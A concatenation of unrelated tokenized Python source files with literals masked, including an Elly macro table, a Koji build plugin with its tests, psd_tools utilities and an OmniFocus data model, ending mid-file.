ellyWildcard . cSOS : <EOL> k = p . find ( ellyWildcard . cEOS ) <EOL> if k < <NUM_LIT:0> or k == <NUM_LIT:1> : break <EOL> k += <NUM_LIT:1> <EOL> if k == len ( pat ) : break <EOL> m = ellyChar . toIndex ( pat [ <NUM_LIT:1> ] ) <EOL> self . index [ m ] . append ( r ) <EOL> p = p [ k : ] <EOL> c = p [ <NUM_LIT:0> ] <EOL> if c == ellyWildcard . cSOS : <EOL> self . _err ( l = l ) <EOL> continue <EOL> if ellyChar . isLetterOrDigit ( c ) : <EOL> m = ellyChar . toIndex ( c ) <EOL> self . index [ m ] . append ( r ) <EOL> elif ellyChar . isText ( c ) : <EOL> self . index [ <NUM_LIT:0> ] . append ( r ) <EOL> elif not c in ellyWildcard . Matching : <EOL> if c == ellyWildcard . cEND : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> print >> sys . stderr , '<STR_LIT>' , l , '<STR_LIT:]>' <EOL> else : <EOL> dc = '<STR_LIT:=>' + str ( ord ( c ) - ellyWildcard . X ) <EOL> self . _err ( '<STR_LIT>' , dc ) <EOL> continue <EOL> elif c == ellyWildcard . cANY or c == ellyWildcard . cALL : <EOL> self . anyWx . append ( r ) <EOL> elif c == ellyWildcard . cCAN : <EOL> self . index [ <NUM_LIT:0> ] . append ( r ) <EOL> elif c == ellyWildcard . cDIG or c == ellyWildcard . cSDG : <EOL> self . digWx . append ( r ) <EOL> elif c == ellyWildcard . cSAN : <EOL> self . digWx . append ( r ) <EOL> self . letWx . append ( r ) <EOL> elif c == ellyWildcard . cSPC or c == ellyWildcard . cEND : <EOL> self . _err ( '<STR_LIT>' , l ) <EOL> continue <EOL> else : <EOL> self . letWx . append ( r ) <EOL> self . count += <NUM_LIT:1> <EOL> if self . _errcount > <NUM_LIT:0> : <EOL> print >> sys . stderr , '<STR_LIT>' , self . _errcount , '<STR_LIT>' <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> raise ellyException . TableFailure <EOL> def dump ( self ) : <EOL> """<STR_LIT>""" <EOL> print '<STR_LIT>' <EOL> if len ( self . index [ <NUM_LIT:0> ] ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> _dmpall ( self . index [ <NUM_LIT:0> ] ) <EOL> i = <NUM_LIT:0> <EOL> for slot in self . index : <EOL> if len ( slot ) > <NUM_LIT:0> : <EOL> if i == <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT:[>' + ellyChar . toChar ( i ) + '<STR_LIT>' <EOL> _dmpall ( slot ) <EOL> i += <NUM_LIT:1> <EOL> if len ( self . letWx ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> _dmpall ( self . letWx ) <EOL> if len ( self . digWx ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> _dmpall ( self . digWx ) <EOL> if len ( self . anyWx ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> _dmpall ( self . anyWx ) <EOL> def _dmpall ( slot ) : <EOL> """<STR_LIT>""" <EOL> for r in slot : <EOL> print u'<STR_LIT>' . format ( ellyWildcard . deconvert ( r [ <NUM_LIT:0> ] ) ) + '<STR_LIT>' , list ( r [ <NUM_LIT:1> ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import substitutionBuffer <EOL> import ellyDefinitionReader <EOL> import ellyConfiguration <EOL> base = ellyConfiguration . baseSource + '<STR_LIT:/>' <EOL> name = sys . argv [ <NUM_LIT:1> ] if len ( sys . argv ) > <NUM_LIT:1> else '<STR_LIT:test>' <EOL> dfns = base + name + '<STR_LIT>' <EOL> print '<STR_LIT>' , dfns <EOL> inp = ellyDefinitionReader . EllyDefinitionReader ( dfns ) <EOL> if inp . error != None : <EOL> print inp . error <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> mtb = MacroTable ( inp ) <EOL> except ellyException . TableFailure : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' , mtb , '<STR_LIT>' , mtb . count , '<STR_LIT>' <EOL> if mtb . count == <NUM_LIT:0> : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> print '<STR_LIT>' <EOL> mtb . dump ( ) <EOL> sb = substitutionBuffer . SubstitutionBuffer ( mtb ) <EOL> while True : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> st = sys . stdin . readline ( ) <EOL> if len ( st ) <= <NUM_LIT:1> : break <EOL> ss = st . decode ( '<STR_LIT:utf8>' ) . strip ( ) <EOL> print '<STR_LIT>' , list ( ss ) , '<STR_LIT:(>' + str ( len ( ss ) ) + '<STR_LIT:)>' <EOL> sb . clear ( ) <EOL> sb . append ( ss ) <EOL> no = <NUM_LIT:0> <EOL> while True : <EOL> to = sb . getNext ( ) <EOL> if to == None : break <EOL> no += <NUM_LIT:1> <EOL> print '<STR_LIT>' . format ( no ) , unicode ( to ) <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) </s>
<s> import os <EOL> import sys <EOL> from datetime import datetime <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> from yql import __version__ as VERSION <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> source_encoding = '<STR_LIT:utf-8>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' '<STR_LIT>' '<STR_LIT>' % datetime . now ( ) . year <EOL> version = VERSION <EOL> release = VERSION <EOL> exclude_trees = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ '<STR_LIT>' ] <EOL> html_logo = "<STR_LIT>" <EOL> html_favicon = "<STR_LIT>" <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_last_updated_fmt = '<STR_LIT>' <EOL> html_use_smartypants = True <EOL> html_use_modindex = True <EOL> html_use_index = True <EOL> html_show_sourcelink = True <EOL> html_use_opensearch = '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] </s>
<s> from arcs import Arcs <EOL> from utils import point_compare , is_point , Strut , mysterious_line_test <EOL> class Line : <EOL> def __init__ ( self , Q ) : <EOL> self . arcs = Arcs ( Q ) <EOL> def arc ( self , current_arc , last = False ) : <EOL> n = len ( current_arc ) <EOL> if last and not len ( self . line_arcs ) and n == <NUM_LIT:1> : <EOL> point = current_arc [ <NUM_LIT:0> ] <EOL> index = self . arcs . get_index ( point ) <EOL> if len ( index ) : <EOL> self . line_arcs . append ( index [ <NUM_LIT:0> ] ) <EOL> else : <EOL> index . append ( self . arcs . length ) <EOL> self . line_arcs . append ( index [ <NUM_LIT:0> ] ) <EOL> self . arcs . push ( current_arc ) <EOL> elif n > <NUM_LIT:1> : <EOL> self . line_arcs . append ( self . arcs . check ( current_arc ) ) <EOL> def line ( self , points , opened ) : <EOL> self . line_arcs = [ ] ; <EOL> n = len ( points ) <EOL> current_arc = Strut ( ) <EOL> k = <NUM_LIT:0> <EOL> p = False <EOL> t = False <EOL> if not opened : <EOL> points . pop ( ) <EOL> n -= <NUM_LIT:1> <EOL> while k < n : <EOL> t = self . arcs . peak ( points [ k ] ) <EOL> if opened : <EOL> break <EOL> if p and not mysterious_line_test ( p , t ) : <EOL> tInP = all ( map ( lambda line : line in p , t ) ) <EOL> pInT = all ( map ( lambda line : line in t , p ) ) <EOL> if tInP and not pInT : <EOL> k -= <NUM_LIT:1> <EOL> break <EOL> p = t <EOL> k += <NUM_LIT:1> <EOL> if k == n and isinstance ( p , list ) and len ( p ) > <NUM_LIT:1> : <EOL> point0 = points [ <NUM_LIT:0> ] <EOL> i = <NUM_LIT:2> <EOL> k = <NUM_LIT:0> <EOL> while i < n : <EOL> point = points [ i ] ; <EOL> if point_compare ( point0 , point ) > <NUM_LIT:0> : <EOL> point0 = point <EOL> k = i <EOL> i += <NUM_LIT:1> <EOL> i = - <NUM_LIT:1> <EOL> if opened : <EOL> m = n - <NUM_LIT:1> <EOL> else : <EOL> m = n <EOL> while i < m : <EOL> i += <NUM_LIT:1> <EOL> point = points [ ( i + k ) % n ] <EOL> p = self . arcs . peak ( point ) <EOL> if not mysterious_line_test ( p , t ) : <EOL> tInP = all ( map ( lambda line : line in p , t ) ) <EOL> pInT = all ( map ( lambda line : line in t , p ) ) <EOL> if tInP : <EOL> current_arc . append ( point ) ; <EOL> self . arc ( current_arc ) <EOL> if not tInP and not pInT and len ( current_arc ) : <EOL> self . arc ( Strut ( [ current_arc [ - <NUM_LIT:1> ] , point ] ) ) <EOL> if pInT and len ( current_arc ) : <EOL> current_arc = Strut ( [ current_arc [ - <NUM_LIT:1> ] ] ) <EOL> else : <EOL> current_arc = Strut ( ) ; <EOL> if not len ( current_arc ) or point_compare ( current_arc [ - <NUM_LIT:1> ] , point ) : <EOL> current_arc . append ( point ) <EOL> t = p <EOL> self . arc ( current_arc , True ) <EOL> return self . line_arcs <EOL> def line_closed ( self , points ) : <EOL> return self . line ( points , False ) <EOL> def line_open ( self , points ) : <EOL> return self . line ( points , True ) <EOL> def map_func ( self , arc ) : <EOL> if len ( arc ) == <NUM_LIT:2> and type ( arc [ <NUM_LIT:0> ] ) == type ( <NUM_LIT:1> ) : <EOL> arc = [ arc ] <EOL> i = <NUM_LIT:1> <EOL> n = len ( arc ) <EOL> point = arc [ <NUM_LIT:0> ] <EOL> x1 = point [ <NUM_LIT:0> ] <EOL> x2 = dx = y2 = dy = False <EOL> y1 = point [ <NUM_LIT:1> ] <EOL> points = [ [ int ( x1 ) , int ( y1 ) ] ] <EOL> while i < n : <EOL> point = arc [ i ] <EOL> if not is_point ( point ) : <EOL> i += <NUM_LIT:1> <EOL> continue <EOL> x2 = point [ <NUM_LIT:0> ] <EOL> y2 = point [ <NUM_LIT:1> ] <EOL> dx = int ( x2 - x1 ) <EOL> dy = int ( y2 - y1 ) <EOL> if dx or dy : <EOL> points . append ( [ dx , dy ] ) <EOL> x1 = x2 <EOL> y1 = y2 <EOL> i += <NUM_LIT:1> <EOL> return points <EOL> def get_arcs ( self ) : <EOL> for num in range ( <NUM_LIT:0> , self . arcs . length ) : <EOL> yield self . map_func ( self . arcs . arcs [ str ( num ) ] ) <EOL> self . arcs . close ( ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import koji <EOL> from atomic_reactor . constants import YUM_REPOS_DIR <EOL> from atomic_reactor . plugin import PreBuildPlugin <EOL> from atomic_reactor . util import render_yum_repo <EOL> class KojiPlugin ( PreBuildPlugin ) : <EOL> key = "<STR_LIT>" <EOL> is_allowed_to_fail = False <EOL> def __init__ ( self , tasker , workflow , target , hub , root , proxy = None ) : <EOL> """<STR_LIT>""" <EOL> super ( KojiPlugin , self ) . __init__ ( tasker , workflow ) <EOL> self . target = target <EOL> self . xmlrpc = koji . ClientSession ( hub ) <EOL> self . pathinfo = koji . PathInfo ( topdir = root ) <EOL> self . proxy = proxy <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> target_info = self . xmlrpc . getBuildTarget ( self . target ) <EOL> if target_info is None : <EOL> self . log . error ( "<STR_LIT>" , self . target ) <EOL> raise RuntimeError ( "<STR_LIT>" % self . target ) <EOL> tag_info = self . xmlrpc . getTag ( target_info [ '<STR_LIT>' ] ) <EOL> repo_info = self . xmlrpc . getRepo ( tag_info [ '<STR_LIT:id>' ] ) <EOL> baseurl = self . pathinfo . repo ( repo_info [ '<STR_LIT:id>' ] , tag_info [ '<STR_LIT:name>' ] ) + "<STR_LIT>" <EOL> self . log . info ( "<STR_LIT>" , baseurl ) <EOL> repo = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' % self . target , <EOL> '<STR_LIT>' : baseurl , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> if baseurl . startswith ( "<STR_LIT>" ) : <EOL> self . log . info ( "<STR_LIT>" ) <EOL> repo [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> if self . proxy : <EOL> self . log . info ( "<STR_LIT>" , self . proxy ) <EOL> repo [ '<STR_LIT>' ] = self . proxy <EOL> path = os . path . join ( YUM_REPOS_DIR , self . target + "<STR_LIT>" ) <EOL> self . log . info ( "<STR_LIT>" , path ) <EOL> self . workflow . files [ path ] = render_yum_repo ( repo , escape_dollars = False ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , unicode_literals <EOL> try : <EOL> import koji as koji <EOL> except ImportError : <EOL> import inspect <EOL> import os <EOL> import sys <EOL> import tests . koji as koji <EOL> mock_koji_path = os . path . dirname ( inspect . getfile ( koji . ClientSession ) ) <EOL> if mock_koji_path not in sys . path : <EOL> sys . path . append ( os . path . dirname ( mock_koji_path ) ) <EOL> del koji <EOL> import koji as koji <EOL> from atomic_reactor . plugins . pre_koji import KojiPlugin <EOL> from atomic_reactor . core import DockerTasker <EOL> from atomic_reactor . inner import DockerBuildWorkflow <EOL> from atomic_reactor . plugin import PreBuildPluginsRunner <EOL> from atomic_reactor . util import ImageName <EOL> from flexmock import flexmock <EOL> import pytest <EOL> from tests . constants import SOURCE , MOCK <EOL> if MOCK : <EOL> from tests . docker_mock import mock_docker <EOL> class X ( object ) : <EOL> pass <EOL> KOJI_TARGET = "<STR_LIT:target>" <EOL> GET_TARGET_RESPONSE = { "<STR_LIT>" : "<STR_LIT>" } <EOL> KOJI_TAG = "<STR_LIT>" <EOL> TAG_ID = "<STR_LIT:1>" <EOL> GET_TAG_RESPONSE = { "<STR_LIT:id>" : TAG_ID , "<STR_LIT:name>" : KOJI_TAG } <EOL> REPO_ID = "<STR_LIT:2>" <EOL> GET_REPO_RESPONSE = { "<STR_LIT:id>" : "<STR_LIT:2>" } <EOL> ROOT = "<STR_LIT>" <EOL> class MockedClientSession ( object ) : <EOL> def __init__ ( self , hub ) : <EOL> pass <EOL> def getBuildTarget ( self , target ) : <EOL> return GET_TARGET_RESPONSE <EOL> def getTag ( self , tag ) : <EOL> return GET_TAG_RESPONSE <EOL> def getRepo ( self , repo ) : <EOL> return GET_REPO_RESPONSE <EOL> class MockedPathInfo ( object ) : <EOL> def __init__ ( self , topdir = None ) : <EOL> self . topdir = topdir <EOL> def repo ( self , repo_id , name ) : <EOL> return "<STR_LIT>" . format ( self . topdir , name , repo_id ) <EOL> def prepare ( ) : <EOL> if MOCK : <EOL> mock_docker ( ) <EOL> tasker = DockerTasker ( ) <EOL> workflow = DockerBuildWorkflow ( SOURCE , "<STR_LIT>" ) <EOL> setattr ( workflow , '<STR_LIT>' , X ( ) ) <EOL> setattr ( workflow . builder , '<STR_LIT>' , "<STR_LIT>" ) <EOL> setattr ( workflow . builder , '<STR_LIT>' , ImageName ( repo = '<STR_LIT>' , tag = '<STR_LIT>' ) ) <EOL> setattr ( workflow . builder , '<STR_LIT:source>' , X ( ) ) <EOL> setattr ( workflow . builder . source , '<STR_LIT>' , None ) <EOL> setattr ( workflow . builder . source , '<STR_LIT:path>' , None ) <EOL> flexmock ( koji , <EOL> ClientSession = MockedClientSession , <EOL> PathInfo = MockedPathInfo ) <EOL> return tasker , workflow <EOL> class TestKoji ( object ) : <EOL> @ pytest . mark . parametrize ( ( '<STR_LIT:root>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , [ <EOL> ( '<STR_LIT>' , <EOL> False , <EOL> None , <EOL> None , <EOL> None ) , <EOL> ( '<STR_LIT>' , <EOL> False , <EOL> None , <EOL> None , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <EOL> False , <EOL> '<STR_LIT>' , <EOL> None , <EOL> None ) , <EOL> ( '<STR_LIT>' , <EOL> False , <EOL> '<STR_LIT>' , <EOL> None , <EOL> '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_koji_plugin ( self , tmpdir , root , koji_ssl_certs , <EOL> expected_string , expected_file , proxy ) : <EOL> tasker , workflow = prepare ( ) <EOL> args = { <EOL> '<STR_LIT:target>' : KOJI_TARGET , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:root>' : root , <EOL> '<STR_LIT>' : proxy <EOL> } <EOL> if koji_ssl_certs : <EOL> args [ '<STR_LIT>' ] = str ( tmpdir ) <EOL> with open ( '<STR_LIT>' . format ( tmpdir ) , '<STR_LIT:w>' ) as ca_fd : <EOL> ca_fd . write ( '<STR_LIT>' ) <EOL> runner = PreBuildPluginsRunner ( tasker , workflow , [ { <EOL> '<STR_LIT:name>' : KojiPlugin . key , <EOL> '<STR_LIT:args>' : args , <EOL> } ] ) <EOL> runner . run ( ) <EOL> repofile = '<STR_LIT>' <EOL> assert repofile in workflow . files <EOL> content = workflow . files [ repofile ] <EOL> assert content . startswith ( "<STR_LIT>" ) <EOL> assert "<STR_LIT>" in content <EOL> assert "<STR_LIT>" in content <EOL> assert "<STR_LIT>" in content <EOL> assert "<STR_LIT>" % root in content <EOL> if proxy : <EOL> assert "<STR_LIT>" % proxy in content <EOL> if expected_string : <EOL> assert expected_string in content <EOL> if expected_file : <EOL> assert expected_file in workflow . files </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , absolute_import , unicode_literals <EOL> import logging <EOL> from osbs . utils import graceful_chain_get <EOL> logger = logging . getLogger ( __name__ ) <EOL> class PodResponse ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pod ) : <EOL> """<STR_LIT>""" <EOL> self . _json = pod <EOL> @ property <EOL> def json ( self ) : <EOL> return self . _json <EOL> def get_container_image_ids ( self ) : <EOL> """<STR_LIT>""" <EOL> statuses = graceful_chain_get ( self . json , "<STR_LIT:status>" , "<STR_LIT>" ) <EOL> if statuses is None : <EOL> return { } <EOL> def remove_prefix ( image_id , prefix ) : <EOL> if image_id . startswith ( prefix ) : <EOL> return image_id [ len ( prefix ) : ] <EOL> return image_id <EOL> return dict ( [ ( status [ '<STR_LIT:image>' ] , remove_prefix ( status [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) ) <EOL> for status in statuses ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , unicode_literals <EOL> import pytest <EOL> import logging <EOL> from osbs . conf import Configuration <EOL> from osbs . api import OSBS <EOL> from osbs . exceptions import OsbsException <EOL> from tempfile import NamedTemporaryFile <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> def test_missing_config ( ) : <EOL> os_conf = Configuration ( conf_file = "<STR_LIT>" , <EOL> conf_section = "<STR_LIT:default>" ) <EOL> def test_no_config ( ) : <EOL> os_conf = Configuration ( conf_file = None , <EOL> openshift_uri = '<STR_LIT>' ) <EOL> assert os_conf . get_openshift_oauth_api_uri ( ) == '<STR_LIT>' <EOL> def test_missing_section ( ) : <EOL> with NamedTemporaryFile ( ) as f : <EOL> os_conf = Configuration ( conf_file = f . name , <EOL> conf_section = "<STR_LIT>" ) <EOL> def test_no_build_type ( ) : <EOL> with NamedTemporaryFile ( mode = '<STR_LIT>' ) as f : <EOL> f . write ( """<STR_LIT>""" ) <EOL> f . flush ( ) <EOL> f . seek ( <NUM_LIT:0> ) <EOL> os_conf = Configuration ( conf_file = f . name , <EOL> conf_section = "<STR_LIT:default>" ) <EOL> assert os_conf . get_build_type ( ) is None <EOL> def test_no_inputs ( ) : <EOL> with NamedTemporaryFile ( mode = '<STR_LIT>' ) as f : <EOL> f . write ( """<STR_LIT>""" ) <EOL> f . flush ( ) <EOL> f . seek ( <NUM_LIT:0> ) <EOL> with pytest . raises ( OsbsException ) : <EOL> os_conf = Configuration ( conf_file = f . name , <EOL> conf_section = "<STR_LIT:default>" ) <EOL> build_conf = Configuration ( conf_file = f . name , <EOL> conf_section = "<STR_LIT:default>" ) <EOL> osbs = OSBS ( os_conf , build_conf ) <EOL> osbs . create_build ( git_uri = "<STR_LIT>" , <EOL> git_ref = "<STR_LIT>" , <EOL> user = "<STR_LIT:user>" , <EOL> component = "<STR_LIT>" , <EOL> target = "<STR_LIT:target>" , <EOL> architecture = "<STR_LIT>" ) </s>
<s> '''<STR_LIT>''' <EOL> import datetime as dt <EOL> import random <EOL> __title__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> class Model ( object ) : <EOL> '''<STR_LIT>''' <EOL> seed = None <EOL> schedule = None <EOL> running = True <EOL> def __init__ ( self , seed = None ) : <EOL> '''<STR_LIT>''' <EOL> if seed is None : <EOL> self . seed = dt . datetime . now ( ) <EOL> else : <EOL> self . seed = seed <EOL> random . seed ( seed ) <EOL> self . running = True <EOL> def run_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> while self . running : <EOL> self . step ( ) <EOL> def step ( self ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> class Agent ( object ) : <EOL> '''<STR_LIT>''' <EOL> model = None <EOL> unique_id = None <EOL> def __init__ ( self , unique_id , model ) : <EOL> '''<STR_LIT>''' <EOL> self . model = model <EOL> def step ( self , model ) : <EOL> '''<STR_LIT>''' <EOL> pass </s>
<s> import unittest <EOL> from app import db , app <EOL> class ApiTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> app . config [ '<STR_LIT>' ] = True <EOL> app . config [ '<STR_LIT>' ] = True <EOL> self . app = app . test_client ( ) <EOL> db . create_all ( ) <EOL> def tearDown ( self ) : <EOL> db . session . remove ( ) <EOL> db . drop_all ( ) </s>
<s> from . _exposition import MetricsResource <EOL> __all__ = [ '<STR_LIT>' ] </s>
<s> from __future__ import absolute_import , unicode_literals , print_function <EOL> import logging <EOL> import docopt <EOL> import psd_tools . reader <EOL> import psd_tools . decoder <EOL> from psd_tools import PSDImage <EOL> from psd_tools . user_api . layers import group_layers <EOL> from psd_tools . debug import pprint <EOL> from psd_tools . version import __version__ <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> logger . addHandler ( logging . StreamHandler ( ) ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> args = docopt . docopt ( main . __doc__ , version = __version__ ) <EOL> if args [ '<STR_LIT>' ] : <EOL> logger . setLevel ( logging . DEBUG ) <EOL> else : <EOL> logger . setLevel ( logging . INFO ) <EOL> encoding = args [ '<STR_LIT>' ] <EOL> if args [ '<STR_LIT>' ] : <EOL> psd = PSDImage . load ( args [ '<STR_LIT>' ] , encoding = encoding ) <EOL> im = psd . as_PIL ( ) <EOL> im . save ( args [ '<STR_LIT>' ] ) <EOL> elif args [ '<STR_LIT>' ] : <EOL> psd = PSDImage . load ( args [ '<STR_LIT>' ] , encoding = encoding ) <EOL> index = int ( args [ '<STR_LIT>' ] ) <EOL> im = psd . layers [ index ] . as_PIL ( ) <EOL> im . save ( args [ '<STR_LIT>' ] ) <EOL> print ( psd . layers ) <EOL> psd . as_PIL ( ) <EOL> elif args [ '<STR_LIT>' ] : <EOL> with open ( args [ '<STR_LIT>' ] , "<STR_LIT:rb>" ) as f : <EOL> decoded = psd_tools . decoder . parse ( <EOL> psd_tools . reader . parse ( f , encoding ) <EOL> ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( decoded . header ) <EOL> print ( "<STR_LIT>" ) <EOL> pprint ( decoded ) <EOL> print ( "<STR_LIT>" ) <EOL> pprint ( group_layers ( decoded ) ) </s>
<s> from __future__ import absolute_import , division , unicode_literals , print_function <EOL> import sys <EOL> import struct <EOL> import array <EOL> try : <EOL> unichr = unichr <EOL> except NameError : <EOL> unichr = chr <EOL> def unpack ( fmt , data ) : <EOL> fmt = str ( "<STR_LIT:>>" + fmt ) <EOL> return struct . unpack ( fmt , data ) <EOL> def read_fmt ( fmt , fp ) : <EOL> """<STR_LIT>""" <EOL> fmt = str ( "<STR_LIT:>>" + fmt ) <EOL> fmt_size = struct . calcsize ( fmt ) <EOL> data = fp . read ( fmt_size ) <EOL> assert len ( data ) == fmt_size , ( len ( data ) , fmt_size ) <EOL> return struct . unpack ( fmt , data ) <EOL> def pad ( number , divisor ) : <EOL> if number % divisor : <EOL> number = ( number // divisor + <NUM_LIT:1> ) * divisor <EOL> return number <EOL> def read_pascal_string ( fp , encoding , padding = <NUM_LIT:1> ) : <EOL> length = read_fmt ( "<STR_LIT:B>" , fp ) [ <NUM_LIT:0> ] <EOL> if length == <NUM_LIT:0> : <EOL> fp . seek ( padding - <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> return '<STR_LIT>' <EOL> res = fp . read ( length ) <EOL> padded_length = pad ( length + <NUM_LIT:1> , padding ) - <NUM_LIT:1> <EOL> fp . seek ( padded_length - length , <NUM_LIT:1> ) <EOL> return res . decode ( encoding , '<STR_LIT:replace>' ) <EOL> def read_unicode_string ( fp ) : <EOL> num_chars = read_fmt ( "<STR_LIT:I>" , fp ) [ <NUM_LIT:0> ] <EOL> data = fp . read ( num_chars * <NUM_LIT:2> ) <EOL> chars = be_array_from_bytes ( "<STR_LIT:H>" , data ) <EOL> return "<STR_LIT>" . join ( unichr ( num ) for num in chars ) <EOL> def read_be_array ( fmt , count , fp ) : <EOL> """<STR_LIT>""" <EOL> arr = array . array ( str ( fmt ) ) <EOL> arr . fromstring ( fp . read ( count * arr . itemsize ) ) <EOL> return fix_byteorder ( arr ) <EOL> def fix_byteorder ( arr ) : <EOL> """<STR_LIT>""" <EOL> if sys . byteorder == '<STR_LIT>' : <EOL> arr . byteswap ( ) <EOL> return arr <EOL> def be_array_from_bytes ( fmt , data ) : <EOL> """<STR_LIT>""" <EOL> arr = array . array ( str ( fmt ) , data ) <EOL> return fix_byteorder ( arr ) <EOL> def trimmed_repr ( data , trim_length = <NUM_LIT:30> ) : <EOL> if isinstance ( data , bytes ) : <EOL> if len ( data ) > trim_length : <EOL> return repr ( data [ : trim_length ] + b'<STR_LIT>' + str ( len ( data ) ) . encode ( '<STR_LIT:ascii>' ) ) <EOL> return repr ( data ) <EOL> def synchronize ( fp , limit = <NUM_LIT:8> ) : <EOL> signature_list = ( b'<STR_LIT>' , b'<STR_LIT>' ) <EOL> start = fp . tell ( ) <EOL> data = fp . read ( limit ) <EOL> for signature in signature_list : <EOL> pos = data . find ( signature ) <EOL> if pos != - <NUM_LIT:1> : <EOL> fp . seek ( start + pos ) <EOL> return True <EOL> fp . seek ( start ) <EOL> return False <EOL> def decode_fixed_point_32bit ( data ) : <EOL> """<STR_LIT>""" <EOL> lo , hi = unpack ( "<STR_LIT>" , data ) <EOL> return lo + hi / ( <NUM_LIT:2> ** <NUM_LIT:16> - <NUM_LIT:1> ) </s>
<s> '''<STR_LIT>''' <EOL> from treemodel import PROJECT , Project , Node , Task , Context , Folder , Note , sort <EOL> import sqlite3 <EOL> from os import environ , path <EOL> from datetime import datetime <EOL> from typeof import TypeOf <EOL> from xml . dom . minidom import parseString <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> '''<STR_LIT>''' <EOL> THIRTY_ONE_YEARS = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:8> <EOL> class OFNote ( Note ) : <EOL> def __init__ ( self , item , noteXMLData ) : <EOL> self . noteXMLData = noteXMLData <EOL> self . item = item <EOL> self . text = None <EOL> self . lines = None <EOL> def get_note_lines ( self ) : <EOL> if self . lines == None : <EOL> logger . debug ( '<STR_LIT>' , self . item . id ) <EOL> dom = parseString ( self . noteXMLData ) <EOL> logger . debug ( '<STR_LIT>' , self . item . id ) <EOL> self . lines = [ ] <EOL> for para in dom . getElementsByTagName ( "<STR_LIT:p>" ) : <EOL> line = [ ] <EOL> for lit in para . getElementsByTagName ( "<STR_LIT>" ) : <EOL> if lit . firstChild != None : <EOL> nodeValue = lit . firstChild . nodeValue <EOL> if nodeValue != None : <EOL> text = self . fix_dodgy_chars ( nodeValue ) <EOL> line . append ( text ) <EOL> self . lines . append ( u'<STR_LIT>' . join ( line ) ) <EOL> logger . debug ( '<STR_LIT>' , self . item . id ) <EOL> return self . lines <EOL> def get_note ( self ) : <EOL> if self . text == None : <EOL> self . text = '<STR_LIT:\n>' . join ( self . get_note_lines ( ) ) <EOL> return self . text <EOL> def fix_dodgy_chars ( self , text ) : <EOL> try : <EOL> return unicode ( text ) <EOL> except : <EOL> buf = [ ] <EOL> for c in text : <EOL> try : <EOL> buf . append ( unicode ( c ) ) <EOL> except : <EOL> buf . append ( '<STR_LIT:?>' ) <EOL> return u'<STR_LIT>' . join ( buf ) <EOL> def datetimeFromAttrib ( ofattribs , name ) : <EOL> val = ofattribs [ name ] <EOL> if val == None : <EOL> return None <EOL> return datetime . fromtimestamp ( THIRTY_ONE_YEARS + val ) <EOL> def intFromAttrib ( ofattribs , name ) : <EOL> val = ofattribs [ name ] <EOL> if val == None : <EOL> return None <EOL> return val <EOL> class OFContext ( Context ) : <EOL> TABLE = '<STR_LIT>' <EOL> COLUMNS = [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ofattribs = TypeOf ( '<STR_LIT>' , dict ) <EOL> def __init__ ( self , ofattribs ) : <EOL> Context . 